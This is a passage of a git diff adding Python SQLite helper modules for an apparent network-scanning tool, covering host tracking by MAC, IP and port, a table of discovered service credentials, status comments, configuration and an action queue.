type=excluded.type,
is_default=excluded.is_default,
is_restore=excluded.is_restore,
is_github=excluded.is_github;
""", (filename, description, date, type_, int(is_default),
int(is_restore), int(is_github)))
def list_backups(self) -> List[Dict[str, Any]]:
"""List all backups ordered by date descending"""
return self.base.query("""
SELECT filename, description, date, type,
is_default, is_restore, is_github
FROM backups
ORDER BY date DESC;
""")
def delete_backup(self, filename: str) -> None:
"""Delete a backup entry by filename"""
self.base.execute("DELETE FROM backups WHERE filename=?;", (filename,))
def clear_default_backup(self) -> None:
"""Clear the default flag on all backups"""
self.base.execute("UPDATE backups SET is_default=0;")
def set_default_backup(self, filename: str) -> None:
"""Set the default flag on a specific backup"""
self.clear_default_backup()
self.base.execute("UPDATE backups SET is_default=1 WHERE filename=?;", (filename,))

159
db_utils/base.py Normal file
View File

@@ -0,0 +1,159 @@
# db_utils/base.py
# Base database connection and transaction management
import sqlite3
import time
from contextlib import contextmanager
from threading import RLock
from typing import Any, Dict, Iterable, List, Optional, Tuple
import logging
from logger import Logger
logger = Logger(name="db_utils.base", level=logging.DEBUG)
class DatabaseBase:
"""
Base database manager providing connection, transaction, and query primitives.
All specialized operation modules inherit access to these primitives.
"""
def __init__(self, db_path: str):
self.db_path = db_path
# Connection with optimized settings for constrained devices (e.g., Raspberry Pi)
self._conn = sqlite3.connect(
self.db_path,
check_same_thread=False,
isolation_level=None # Autocommit mode (we manage transactions explicitly)
)
self._conn.row_factory = sqlite3.Row
self._lock = RLock()
# Small in-process cache for frequently refreshed UI counters
self._cache_ttl = 5.0 # seconds
self._stats_cache = {'data': None, 'timestamp': 0}
# Apply PRAGMA tuning
with self._lock:
cur = self._conn.cursor()
# Optimize SQLite for Raspberry Pi / flash storage
cur.execute("PRAGMA journal_mode=WAL;")
cur.execute("PRAGMA synchronous=NORMAL;")
cur.execute("PRAGMA foreign_keys=ON;")
cur.execute("PRAGMA cache_size=2000;") # Increase page cache
cur.execute("PRAGMA temp_store=MEMORY;") # Use RAM for temporary objects
cur.close()
logger.info(f"DatabaseBase initialized: {db_path}")
# =========================================================================
# CORE CONCURRENCY + SQL PRIMITIVES
# =========================================================================
@contextmanager
def _cursor(self):
"""Thread-safe cursor context manager"""
with self._lock:
cur = self._conn.cursor()
try:
yield cur
finally:
cur.close()
@contextmanager
def transaction(self, immediate: bool = True):
"""Transactional block with automatic rollback on error"""
with self._lock:
try:
self._conn.execute("BEGIN IMMEDIATE;" if immediate else "BEGIN;")
yield
self._conn.execute("COMMIT;")
except Exception:
self._conn.execute("ROLLBACK;")
raise
def execute(self, sql: str, params: Iterable[Any] = (), many: bool = False) -> int:
"""Execute a DML statement. Supports batch mode via `many=True`"""
with self._cursor() as c:
if many and params and isinstance(params, (list, tuple)) and isinstance(params[0], (list, tuple)):
c.executemany(sql, params)
return c.rowcount if c.rowcount is not None else 0
c.execute(sql, params)
return c.rowcount if c.rowcount is not None else 0
def executemany(self, sql: str, seq_of_params: Iterable[Iterable[Any]]) -> int:
"""Convenience wrapper around `execute(..., many=True)`"""
return self.execute(sql, seq_of_params, many=True)
def query(self, sql: str, params: Iterable[Any] = ()) -> List[Dict[str, Any]]:
"""Execute a SELECT and return rows as list[dict]"""
with self._cursor() as c:
c.execute(sql, params)
rows = c.fetchall()
return [dict(r) for r in rows]
def query_one(self, sql: str, params: Iterable[Any] = ()) -> Optional[Dict[str, Any]]:
"""Execute a SELECT and return a single row as dict (or None)"""
with self._cursor() as c:
c.execute(sql, params)
row = c.fetchone()
return dict(row) if row else None
# =========================================================================
# CACHE MANAGEMENT
# =========================================================================
def invalidate_stats_cache(self):
"""Invalidate the small in-memory stats cache"""
self._stats_cache = {'data': None, 'timestamp': 0}
# =========================================================================
# SCHEMA HELPERS
# =========================================================================
def _table_exists(self, name: str) -> bool:
"""Return True if a table exists in the current database"""
row = self.query("SELECT name FROM sqlite_master WHERE type='table' AND name=?", (name,))
return bool(row)
def _column_names(self, table: str) -> List[str]:
"""Return a list of column names for a given table (empty if table missing)"""
with self._cursor() as c:
c.execute(f"PRAGMA table_info({table});")
return [r[1] for r in c.fetchall()]
def _ensure_column(self, table: str, column: str, ddl: str) -> None:
"""Add a column with the provided DDL if it does not exist yet"""
cols = self._column_names(table) if self._table_exists(table) else []
if column not in cols:
self.execute(f"ALTER TABLE {table} ADD COLUMN {ddl};")
# =========================================================================
# MAINTENANCE OPERATIONS
# =========================================================================
def checkpoint(self, mode: str = "TRUNCATE") -> Tuple[int, int, int]:
"""
Force a WAL checkpoint. Returns (busy, log_frames, checkpointed_frames).
mode ∈ {PASSIVE, FULL, RESTART, TRUNCATE}
"""
mode = (mode or "PASSIVE").upper()
if mode not in {"PASSIVE", "FULL", "RESTART", "TRUNCATE"}:
mode = "PASSIVE"
with self._cursor() as c:
c.execute(f"PRAGMA wal_checkpoint({mode});")
row = c.fetchone()
if not row:
return (0, 0, 0)
vals = tuple(row)
return (int(vals[0]), int(vals[1]), int(vals[2]))
def optimize(self) -> None:
"""Run PRAGMA optimize to help the query planner update statistics"""
self.execute("PRAGMA optimize;")
def vacuum(self) -> None:
"""Vacuum the database to reclaim space (use sparingly on flash media)"""
self.execute("VACUUM;")

126
db_utils/comments.py Normal file
View File

@@ -0,0 +1,126 @@
# db_utils/comments.py
# Comment and status message operations
import json
import os
from typing import Any, Dict, List, Optional, Tuple
import logging
from logger import Logger
logger = Logger(name="db_utils.comments", level=logging.DEBUG)
class CommentOps:
"""Comment and status message management operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create comments table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS comments (
id INTEGER PRIMARY KEY AUTOINCREMENT,
text TEXT NOT NULL,
status TEXT NOT NULL,
theme TEXT DEFAULT 'general',
lang TEXT DEFAULT 'fr',
weight INTEGER DEFAULT 1,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
try:
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_comments_dedup
ON comments(text, status, theme, lang);
""")
except Exception:
pass
logger.debug("Comments table created/verified")
# =========================================================================
# COMMENT OPERATIONS
# =========================================================================
def count_comments(self) -> int:
"""Return total number of comment rows"""
row = self.base.query_one("SELECT COUNT(1) c FROM comments;")
return int(row["c"]) if row else 0
def insert_comments(self, comments: List[Tuple[str, str, str, str, int]]):
"""Batch insert of comments (dedup via UNIQUE or INSERT OR IGNORE semantics)"""
if not comments:
return
self.base.executemany(
"INSERT OR IGNORE INTO comments(text,status,theme,lang,weight) VALUES(?,?,?,?,?)",
comments
)
def import_comments_from_json(
self,
json_path: str,
lang: Optional[str] = None,
default_theme: str = "general",
default_weight: int = 1,
clear_existing: bool = False
) -> int:
"""
Import comments from a JSON mapping {status: [strings]}.
Lang is auto-detected from args, shared_data.lang, or filename.
"""
if not json_path or not os.path.exists(json_path):
return 0
try:
with open(json_path, "r", encoding="utf-8") as f:
data = json.load(f)
except Exception:
return 0
if not isinstance(data, dict):
return 0
# Determine language
if not lang:
# From filename (comments.xx.json)
base = os.path.basename(json_path).lower()
if "comments." in base:
parts = base.split(".")
if len(parts) >= 3:
lang = parts[-2]
# Fallback
lang = (lang or "en").lower()
rows: List[Tuple[str, str, str, str, int]] = []
for status, items in data.items():
if not isinstance(items, list):
continue
for txt in items:
t = str(txt).strip()
if not t:
continue
rows.append((t, str(status), str(status), lang, int(default_weight)))
if not rows:
return 0
with self.base.transaction(immediate=True):
if clear_existing:
self.base.execute("DELETE FROM comments;")
self.insert_comments(rows)
return len(rows)
def random_comment_for(self, status: str, lang: str = "en") -> Optional[Dict[str, Any]]:
"""Pick a random comment for the given status/language"""
rows = self.base.query("""
SELECT id, text, status, theme, lang, weight
FROM comments
WHERE status=? AND lang=?
ORDER BY RANDOM()
LIMIT 1;
""", (status, lang))
return rows[0] if rows else None

63
db_utils/config.py Normal file
View File

@@ -0,0 +1,63 @@
# db_utils/config.py
# Configuration management operations
import json
import ast
from typing import Any, Dict
import logging
from logger import Logger
logger = Logger(name="db_utils.config", level=logging.DEBUG)
class ConfigOps:
"""Configuration key-value store operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create config table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS config (
key TEXT PRIMARY KEY,
value TEXT
);
""")
logger.debug("Config table created/verified")
def get_config(self) -> Dict[str, Any]:
"""Load config as typed dict (tries JSON, then literal_eval, then raw)"""
rows = self.base.query("SELECT key, value FROM config;")
out: Dict[str, Any] = {}
for r in rows:
k = r["key"]
raw = r["value"]
try:
v = json.loads(raw)
except Exception:
try:
v = ast.literal_eval(raw)
except Exception:
v = raw
out[k] = v
return out
def save_config(self, config: Dict[str, Any]) -> None:
"""Save the full config mapping to the database (JSON-serialized)"""
if not config:
return
pairs = []
for k, v in config.items():
try:
s = json.dumps(v, ensure_ascii=False)
except Exception:
s = json.dumps(str(v), ensure_ascii=False)
pairs.append((str(k), s))
with self.base.transaction():
self.base.execute("DELETE FROM config;")
self.base.executemany("INSERT INTO config(key,value) VALUES(?,?);", pairs)
logger.info(f"Saved {len(pairs)} config entries")

124
db_utils/credentials.py Normal file
View File

@@ -0,0 +1,124 @@
# db_utils/credentials.py
# Credential storage and management operations
import json
import sqlite3
from typing import Any, Dict, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.credentials", level=logging.DEBUG)
class CredentialOps:
"""Credential storage and retrieval operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create credentials table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS creds (
id INTEGER PRIMARY KEY AUTOINCREMENT,
service TEXT NOT NULL,
mac_address TEXT,
ip TEXT,
hostname TEXT,
"user" TEXT,
"password" TEXT,
port INTEGER,
"database" TEXT,
extra TEXT,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
# Indexes to support real UPSERT and dedup
try:
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_creds_identity
ON creds(service, mac_address, ip, "user", "database", port);
""")
except Exception:
pass
# Optional NULL-safe dedup guard for future rows
try:
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_creds_identity_norm
ON creds(
service,
COALESCE(mac_address,''),
COALESCE(ip,''),
COALESCE("user",''),
COALESCE("database",''),
COALESCE(port,0)
);
""")
except Exception:
pass
logger.debug("Credentials table created/verified")
# =========================================================================
# CREDENTIAL OPERATIONS
# =========================================================================
def insert_cred(self, service: str, mac: Optional[str] = None, ip: Optional[str] = None,
hostname: Optional[str] = None, user: Optional[str] = None,
password: Optional[str] = None, port: Optional[int] = None,
database: Optional[str] = None, extra: Optional[Dict[str, Any]] = None):
"""Insert or update a credential identity; last_seen is touched on update"""
self.base.invalidate_stats_cache()
# NULL-safe normalization to keep a single identity form
mac_n = mac or ""
ip_n = ip or ""
user_n = user or ""
db_n = database or ""
port_n = int(port or 0)
js = json.dumps(extra, ensure_ascii=False) if extra else None
try:
self.base.execute("""
INSERT INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES(?,?,?,?,?,?,?,?,?)
ON CONFLICT(service, mac_address, ip, "user", "database", port) DO UPDATE SET
"password"=excluded."password",
hostname=COALESCE(excluded.hostname, creds.hostname),
last_seen=CURRENT_TIMESTAMP,
extra=COALESCE(excluded.extra, creds.extra);
""", (service, mac_n, ip_n, hostname, user_n, password, port_n, db_n, js))
except sqlite3.OperationalError:
# Fallback if unique index not available: manual upsert
row = self.base.query_one("""
SELECT id FROM creds
WHERE service=? AND COALESCE(mac_address,'')=? AND COALESCE(ip,'')=?
AND COALESCE("user",'')=? AND COALESCE("database",'')=? AND COALESCE(port,0)=?
LIMIT 1
""", (service, mac_n, ip_n, user_n, db_n, port_n))
if row:
self.base.execute("""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP,
extra=COALESCE(?, extra)
WHERE id=?
""", (password, hostname, js, row["id"]))
else:
self.base.execute("""
INSERT INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES(?,?,?,?,?,?,?,?,?)
""", (service, mac_n, ip_n, hostname, user_n, password, port_n, db_n, js))
def list_creds_grouped(self) -> List[Dict[str, Any]]:
"""List all credential rows grouped/sorted by service/ip/user/port for UI"""
return self.base.query("""
SELECT service, mac_address, ip, hostname, "user", "password", port, "database", last_seen
FROM creds
ORDER BY service, ip, "user", port
""")

480
db_utils/hosts.py Normal file
View File

@@ -0,0 +1,480 @@
# db_utils/hosts.py
# Host and network device management operations
import time
import sqlite3
from typing import Any, Dict, Iterable, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.hosts", level=logging.DEBUG)
class HostOps:
"""Host management and tracking operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create hosts and related tables"""
# Main hosts table
self.base.execute("""
CREATE TABLE IF NOT EXISTS hosts (
mac_address TEXT PRIMARY KEY,
ips TEXT,
hostnames TEXT,
alive INTEGER DEFAULT 0,
ports TEXT,
vendor TEXT,
essid TEXT,
previous_hostnames TEXT,
previous_ips TEXT,
previous_ports TEXT,
previous_essids TEXT,
first_seen INTEGER,
last_seen INTEGER,
updated_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_hosts_alive ON hosts(alive);")
# Hostname history table
self.base.execute("""
CREATE TABLE IF NOT EXISTS hostnames_history(
id INTEGER PRIMARY KEY AUTOINCREMENT,
mac_address TEXT NOT NULL,
hostname TEXT NOT NULL,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
is_current INTEGER DEFAULT 1,
UNIQUE(mac_address, hostname)
);
""")
# Guarantee a single current hostname per MAC
try:
# One and only one "current" hostname row per MAC in history
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_hostname_current
ON hostnames_history(mac_address)
WHERE is_current=1;
""")
except Exception:
pass
# Uniqueness for real MACs only (allows legacy stubs in old DBs but our scanner no longer writes them)
try:
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS ux_hosts_real_mac
ON hosts(mac_address)
WHERE instr(mac_address, ':') > 0;
""")
except Exception:
pass
logger.debug("Hosts tables created/verified")
# =========================================================================
# HOST CRUD OPERATIONS
# =========================================================================
def get_all_hosts(self) -> List[Dict[str, Any]]:
"""Get all hosts with current/previous IPs/ports/essids ordered by liveness then MAC"""
return self.base.query("""
SELECT mac_address, ips, previous_ips,
hostnames, previous_hostnames,
alive,
ports, previous_ports,
vendor, essid, previous_essids,
first_seen, last_seen
FROM hosts
ORDER BY alive DESC, mac_address;
""")
def update_host(self, mac_address: str, ips: Optional[str] = None,
hostnames: Optional[str] = None, alive: Optional[int] = None,
ports: Optional[str] = None, vendor: Optional[str] = None,
essid: Optional[str] = None):
"""
Partial upsert of the host row. None/'' fields do not erase existing values.
For automatic tracking of previous_* fields, use update_*_current helpers instead.
"""
# --- Hardening: normalize and guard ---
# Always store normalized lowercase MACs; refuse 'ip:' stubs defensively.
mac_address = (mac_address or "").strip().lower()
if mac_address.startswith("ip:"):
raise ValueError("stub MAC not allowed (scanner runs in no-stub mode)")
self.base.invalidate_stats_cache()
now = int(time.time())
self.base.execute("""
INSERT INTO hosts(mac_address, ips, hostnames, alive, ports, vendor, essid,
first_seen, last_seen, updated_at)
VALUES(?, ?, ?, COALESCE(?, 0), ?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
ips = COALESCE(NULLIF(excluded.ips, ''), hosts.ips),
hostnames = COALESCE(NULLIF(excluded.hostnames, ''), hosts.hostnames),
alive = COALESCE(excluded.alive, hosts.alive),
ports = COALESCE(NULLIF(excluded.ports, ''), hosts.ports),
vendor = COALESCE(NULLIF(excluded.vendor, ''), hosts.vendor),
essid = COALESCE(NULLIF(excluded.essid, ''), hosts.essid),
last_seen = ?,
updated_at= CURRENT_TIMESTAMP;
""", (mac_address, ips, hostnames, alive, ports, vendor, essid, now, now, now))
# =========================================================================
# HOSTNAME OPERATIONS
# =========================================================================
def update_hostname(self, mac_address: str, new_hostname: str):
"""Update current hostname + track previous/current in both hosts and history tables"""
new_hostname = (new_hostname or "").strip()
if not new_hostname:
return
with self.base.transaction(immediate=True):
row = self.base.query(
"SELECT hostnames, previous_hostnames FROM hosts WHERE mac_address=? LIMIT 1;",
(mac_address,)
)
curr = (row[0]["hostnames"] or "") if row else ""
prev = (row[0]["previous_hostnames"] or "") if row else ""
curr_list = [h for h in curr.split(';') if h]
prev_list = [h for h in prev.split(';') if h]
if new_hostname in curr_list:
curr_list = [new_hostname] + [h for h in curr_list if h != new_hostname]
next_curr = ';'.join(curr_list)
next_prev = ';'.join(prev_list)
else:
merged_prev = list(dict.fromkeys(curr_list + prev_list))[:50] # cap at 50
next_curr = new_hostname
next_prev = ';'.join(merged_prev)
self.base.execute("""
INSERT INTO hosts(mac_address, hostnames, previous_hostnames, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
hostnames = excluded.hostnames,
previous_hostnames = excluded.previous_hostnames,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, next_curr, next_prev))
# Update hostname history table
self.base.execute("""
UPDATE hostnames_history
SET is_current=0, last_seen=CURRENT_TIMESTAMP
WHERE mac_address=? AND is_current=1;
""", (mac_address,))
self.base.execute("""
INSERT INTO hostnames_history(mac_address, hostname, is_current)
VALUES(?,?,1)
ON CONFLICT(mac_address, hostname) DO UPDATE SET
is_current=1, last_seen=CURRENT_TIMESTAMP;
""", (mac_address, new_hostname))
def get_current_hostname(self, mac_address: str) -> Optional[str]:
"""Get the current hostname from history when available; fallback to hosts.hostnames"""
row = self.base.query("""
SELECT hostname FROM hostnames_history
WHERE mac_address=? AND is_current=1 LIMIT 1;
""", (mac_address,))
if row:
return row[0]["hostname"]
row = self.base.query("SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1;", (mac_address,))
if row and row[0]["hostnames"]:
return row[0]["hostnames"].split(';', 1)[0]
return None
def record_hostname_seen(self, mac_address: str, hostname: str):
"""Alias for update_hostname: mark a hostname as seen/current"""
self.update_hostname(mac_address, hostname)
def list_hostname_history(self, mac_address: str) -> List[Dict[str, Any]]:
"""Return the full hostname history for a MAC (current first)"""
return self.base.query("""
SELECT hostname, first_seen, last_seen, is_current
FROM hostnames_history
WHERE mac_address=?
ORDER BY is_current DESC, last_seen DESC, first_seen DESC;
""", (mac_address,))
# =========================================================================
# IP OPERATIONS
# =========================================================================
def update_ips_current(self, mac_address: str, current_ips: Iterable[str], cap_prev: int = 200):
"""Replace current IP set and roll removed IPs into previous_ips (deduped, size-capped)"""
cur_set = {ip.strip() for ip in (current_ips or []) if ip}
row = self.base.query("SELECT ips, previous_ips FROM hosts WHERE mac_address=? LIMIT 1;", (mac_address,))
prev_cur = set(self._parse_list(row[0]["ips"])) if row else set()
prev_prev = set(self._parse_list(row[0]["previous_ips"])) if row else set()
removed = prev_cur - cur_set
prev_prev |= removed
if len(prev_prev) > cap_prev:
prev_prev = set(sorted(prev_prev, key=self._sort_ip_key)[:cap_prev])
ips_sorted = ";".join(sorted(cur_set, key=self._sort_ip_key))
prev_sorted = ";".join(sorted(prev_prev, key=self._sort_ip_key))
self.base.execute("""
INSERT INTO hosts(mac_address, ips, previous_ips, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
ips = excluded.ips,
previous_ips = excluded.previous_ips,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, ips_sorted, prev_sorted))
# =========================================================================
# PORT OPERATIONS
# =========================================================================
def update_ports_current(self, mac_address: str, current_ports: Iterable[int], cap_prev: int = 500):
"""Replace current port set and roll removed ports into previous_ports (deduped, size-capped)"""
cur_set = set(int(p) for p in (current_ports or []) if str(p).isdigit())
row = self.base.query("SELECT ports, previous_ports FROM hosts WHERE mac_address=? LIMIT 1;", (mac_address,))
prev_cur = set(int(p) for p in self._parse_list(row[0]["ports"])) if row else set()
prev_prev = set(int(p) for p in self._parse_list(row[0]["previous_ports"])) if row else set()
removed = prev_cur - cur_set
prev_prev |= removed
if len(prev_prev) > cap_prev:
prev_prev = set(sorted(prev_prev)[:cap_prev])
ports_sorted = ";".join(str(p) for p in sorted(cur_set))
prev_sorted = ";".join(str(p) for p in sorted(prev_prev))
self.base.execute("""
INSERT INTO hosts(mac_address, ports, previous_ports, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
ports = excluded.ports,
previous_ports = excluded.previous_ports,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, ports_sorted, prev_sorted))
# =========================================================================
# ESSID OPERATIONS
# =========================================================================
def update_essid_current(self, mac_address: str, new_essid: Optional[str], cap_prev: int = 50):
"""Update current ESSID and move previous one into previous_essids if it changed"""
new_essid = (new_essid or "").strip()
row = self.base.query(
"SELECT essid, previous_essids FROM hosts WHERE mac_address=? LIMIT 1;",
(mac_address,)
)
if row:
old = (row[0]["essid"] or "").strip()
prev_prev = self._parse_list(row[0]["previous_essids"]) or []
else:
old = ""
prev_prev = []
if old and new_essid and new_essid == old:
essid = new_essid
prev_joined = ";".join(prev_prev)
else:
if old and old not in prev_prev:
prev_prev = [old] + prev_prev
prev_prev = prev_prev[:cap_prev]
essid = new_essid
prev_joined = ";".join(prev_prev)
self.base.execute("""
INSERT INTO hosts(mac_address, essid, previous_essids, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
essid = excluded.essid,
previous_essids = excluded.previous_essids,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, essid, prev_joined))
# =========================================================================
# IP STUB MERGING
# =========================================================================
def merge_ip_stub_into_real(self, ip: str, real_mac: str,
hostname: Optional[str] = None, essid_hint: Optional[str] = None):
"""
Merge a host 'IP:<ip>' stub with the host at 'real_mac' (if present) or rename the stub.
- Unifies ips, hostnames, ports, vendor, essid, first_seen/last_seen, alive.
- Updates tables that have a 'mac_address' column to point to the real MAC.
- SSID tolerance (if one of the two is empty, keep the present one).
- If the host 'real_mac' doesn't exist yet, simply rename the stub -> real_mac.
"""
if not real_mac or ':' not in real_mac:
return # nothing to do if we don't have a real MAC
now = int(time.time())
stub_key = f"IP:{ip}".lower()
real_key = real_mac.lower()
with self.base._lock:
con = self.base._conn
cur = con.cursor()
# Retrieve stub candidates (by mac=IP:ip) + fallback by ip contained and mac 'IP:%'
cur.execute("""
SELECT * FROM hosts
WHERE lower(mac_address)=?
OR (lower(mac_address) LIKE 'ip:%' AND (ips LIKE '%'||?||'%'))
ORDER BY lower(mac_address)=? DESC
LIMIT 1
""", (stub_key, ip, stub_key))
stub = cur.fetchone()
# Nothing to merge?
cur.execute("SELECT * FROM hosts WHERE lower(mac_address)=? LIMIT 1", (real_key,))
real = cur.fetchone()
if not stub and not real:
# No record: create the real one directly
cur.execute("""INSERT OR IGNORE INTO hosts
(mac_address, ips, hostnames, ports, vendor, essid, alive, first_seen, last_seen)
VALUES (?,?,?,?,?,?,1,?,?)""",
(real_key, ip, hostname or None, None, None, essid_hint or None, now, now))
con.commit()
return
if stub and not real:
# Rename the stub -> real MAC
ips_merged = self._union_semicol(stub['ips'], ip, sort_ip=True)
hosts_merged = self._union_semicol(stub['hostnames'], hostname)
essid_final = stub['essid'] or essid_hint
vendor_final = stub['vendor']
cur.execute("""UPDATE hosts SET
mac_address=?,
ips=?,
hostnames=?,
essid=COALESCE(?, essid),
alive=1,
last_seen=?
WHERE lower(mac_address)=?""",
(real_key, ips_merged, hosts_merged, essid_final, now, stub['mac_address'].lower()))
# Redirect references from other tables (if they exist)
self._redirect_mac_references(cur, stub['mac_address'].lower(), real_key)
con.commit()
return
if stub and real:
# Full merge into the real, then delete stub
ips_merged = self._union_semicol(real['ips'], stub['ips'], sort_ip=True)
ips_merged = self._union_semicol(ips_merged, ip, sort_ip=True)
hosts_merged = self._union_semicol(real['hostnames'], stub['hostnames'])
hosts_merged = self._union_semicol(hosts_merged, hostname)
ports_merged = self._union_semicol(real['ports'], stub['ports'])
vendor_final = real['vendor'] or stub['vendor']
essid_final = real['essid'] or stub['essid'] or essid_hint
first_seen = min(int(real['first_seen'] or now), int(stub['first_seen'] or now))
last_seen = max(int(real['last_seen'] or now), int(stub['last_seen'] or now), now)
cur.execute("""UPDATE hosts SET
ips=?,
hostnames=?,
ports=?,
vendor=COALESCE(?, vendor),
essid=COALESCE(?, essid),
alive=1,
first_seen=?,
last_seen=?
WHERE lower(mac_address)=?""",
(ips_merged, hosts_merged, ports_merged, vendor_final, essid_final,
first_seen, last_seen, real_key))
# Redirect references to real_key then delete stub
self._redirect_mac_references(cur, stub['mac_address'].lower(), real_key)
cur.execute("DELETE FROM hosts WHERE lower(mac_address)=?", (stub['mac_address'].lower(),))
con.commit()
return
# No stub but a real exists already: ensure current IP/hostname are unified
if real and not stub:
ips_merged = self._union_semicol(real['ips'], ip, sort_ip=True)
hosts_merged = self._union_semicol(real['hostnames'], hostname)
essid_final = real['essid'] or essid_hint
cur.execute("""UPDATE hosts SET
ips=?,
hostnames=?,
essid=COALESCE(?, essid),
alive=1,
last_seen=?
WHERE lower(mac_address)=?""",
(ips_merged, hosts_merged, essid_final, now, real_key))
con.commit()
def _redirect_mac_references(self, cur, old_mac: str, new_mac: str):
"""Redirect mac_address references in all relevant tables"""
try:
# Discover all tables with a mac_address column
cur.execute("""SELECT name FROM sqlite_master
WHERE type='table' AND name NOT LIKE 'sqlite_%'""")
for (tname,) in cur.fetchall():
if tname == 'hosts':
continue
try:
cur.execute(f"PRAGMA table_info({tname})")
cols = [r[1].lower() for r in cur.fetchall()]
if 'mac_address' in cols:
cur.execute(f"""UPDATE {tname}
SET mac_address=?
WHERE lower(mac_address)=?""",
(new_mac, old_mac))
except Exception:
pass
except Exception:
pass
# =========================================================================
# HELPER METHODS
# =========================================================================
def _parse_list(self, s: Optional[str]) -> List[str]:
"""Parse a semicolon-separated string into a list, ignoring empties"""
return [x for x in (s or "").split(";") if x]
def _sort_ip_key(self, ip: str):
"""Return a sortable key for IPv4 addresses; non-IPv4 sorts last"""
if ip and ip.count(".") == 3:
try:
return tuple(int(x) for x in ip.split("."))
except Exception:
return (0, 0, 0, 0)
return (0, 0, 0, 0)
def _union_semicol(self, *values: Optional[str], sort_ip: bool = False) -> str:
"""Union deduplicated of semicolon-separated lists (ignores empties)"""
def _key(x):
if sort_ip and x.count('.') == 3:
try:
return tuple(map(int, x.split('.')))
except Exception:
return (0, 0, 0, 0)
return x
s = set()
for v in values:
if not v:
continue
for it in str(v).split(';'):
it = it.strip()
if it:
s.add(it)
if not s:
return ""
return ';'.join(sorted(s, key=_key))

410
db_utils/queue.py Normal file
View File

@@ -0,0 +1,410 @@
# db_utils/queue.py
# Action queue management operations
import json
import sqlite3
from typing import Any, Dict, Iterable, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.queue", level=logging.DEBUG)
class QueueOps:
"""Action queue scheduling and execution tracking operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create action queue table and indexes"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS action_queue (
id INTEGER PRIMARY KEY AUTOINCREMENT,
action_name TEXT NOT NULL,
mac_address TEXT NOT NULL,
ip TEXT NOT NULL,
port INTEGER,
hostname TEXT,
service TEXT,
priority INTEGER DEFAULT 50,
status TEXT DEFAULT 'pending',
retry_count INTEGER DEFAULT 0,
max_retries INTEGER DEFAULT 3,
created_at TEXT DEFAULT CURRENT_TIMESTAMP,
scheduled_for TEXT,
started_at TEXT,
completed_at TEXT,
expires_at TEXT,
trigger_source TEXT,
dependencies TEXT,
conditions TEXT,
result_summary TEXT,
error_message TEXT,
tags TEXT,
metadata TEXT,
FOREIGN KEY (mac_address) REFERENCES hosts(mac_address)
);
""")
# Optimized indexes for queue operations
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_pending ON action_queue(status) WHERE status='pending';")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_scheduled ON action_queue(scheduled_for) WHERE status='scheduled';")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_mac_action ON action_queue(mac_address, action_name);")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_key_status ON action_queue(action_name, mac_address, port, status);")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_queue_key_time ON action_queue(action_name, mac_address, port, completed_at);")
# Unique constraint for a single upcoming schedule per action/target
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_next_scheduled
ON action_queue(action_name,
COALESCE(mac_address,''),
COALESCE(service,''),
COALESCE(port,-1))
WHERE status='scheduled';
""")
logger.debug("Action queue table created/verified")
# =========================================================================
# QUEUE RETRIEVAL OPERATIONS
# =========================================================================
def get_next_queued_action(self) -> Optional[Dict[str, Any]]:
"""
Fetch the next action to execute from the queue.
Priority is dynamically boosted: +1 per 5 minutes since creation, capped at +100.
"""
rows = self.base.query("""
SELECT *,
MIN(100, priority + CAST((strftime('%s','now') - strftime('%s',created_at))/300 AS INTEGER)) AS priority_effective
FROM action_queue
WHERE status = 'pending'
AND (scheduled_for IS NULL OR scheduled_for <= datetime('now'))
ORDER BY priority_effective DESC,
COALESCE(scheduled_for, created_at) ASC
LIMIT 1
""")
return rows[0] if rows else None
def list_action_queue(self, statuses: Optional[Iterable[str]] = None) -> List[Dict[str, Any]]:
"""List queue entries with a computed `priority_effective` column for pending items"""
order_sql = """
CASE status
WHEN 'running' THEN 1
WHEN 'pending' THEN 2
WHEN 'scheduled' THEN 3
